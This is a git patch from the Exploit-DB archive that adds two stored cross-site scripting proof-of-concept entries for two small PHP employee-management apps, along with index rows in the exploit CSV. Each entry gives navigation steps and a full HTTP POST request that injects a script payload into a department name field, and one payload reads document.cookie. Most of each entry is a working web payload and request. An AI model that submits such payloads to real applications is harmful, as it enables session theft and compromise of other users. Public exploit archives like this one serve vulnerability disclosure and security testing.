From c26eab756eaac17aef6a77298a52502d016903bb Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 11 Nov 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-11-11

2 changes to exploits/shellcodes

Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
---
 exploits/php/webapps/50506.txt | 36 ++++++++++++++++++++++++
 exploits/php/webapps/50507.txt | 50 ++++++++++++++++++++++++++++++++++
 files_exploits.csv             |  2 ++
 3 files changed, 88 insertions(+)
 create mode 100644 exploits/php/webapps/50506.txt
 create mode 100644 exploits/php/webapps/50507.txt

diff --git a/exploits/php/webapps/50506.txt b/exploits/php/webapps/50506.txt
new file mode 100644
index 000000000..bac786b81
--- /dev/null
+++ b/exploits/php/webapps/50506.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
+# Date: 09/11/2021
+# Exploit Author: Ragavender A G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
+
+# Version: v1.0
+
+# Tested on: Windows 10
+
+*Exploit:*
+
+1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance
+2. Add New department with the following value:
+
+   - Name: *<svg/onload=alert(1)>*
+
+3. Save the Department and refresh the page, which should trigger the payload.
+
+*PoC:*
+
+POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/edtms/edtms/admin/?page=maintenance
+Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3
+
+id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1
\ No newline at end of file
diff --git a/exploits/php/webapps/50507.txt b/exploits/php/webapps/50507.txt
new file mode 100644
index 000000000..a6e91e478
--- /dev/null
+++ b/exploits/php/webapps/50507.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
+# Date: 10.11.2021
+# Exploit Author: İlhami Selamet
+# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
+# Version: v1.0
+# Tested on: Kali Linux + XAMPP v8.0.12
+
+Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.
+
+Step 1 - Login with admin account & navigate to  'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department
+Step 1 - Click on the 'Create New' button for adding a new department.
+Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>
+Step 3 - Save the department.
+
+The stored XSS triggers for all users that navigate to the 'Department List' page.
+
+PoC
+
+POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
+Content-Length: 555
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
+Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54
+
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="name"
+
+<script>alert(document.cookie);</script>
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="description"
+
+desc
+-----------------------------407760789114464123714007564888
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------407760789114464123714007564888--
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 97d44682e..54c19dd63 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44604,3 +44604,5 @@ id,file,description,date,author,type,platform,port
 50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",1970-01-01,"Martin Cernac",webapps,php,
 50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",1970-01-01,"Murat DEMİRCİ",webapps,php,
 50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
+50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
+50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,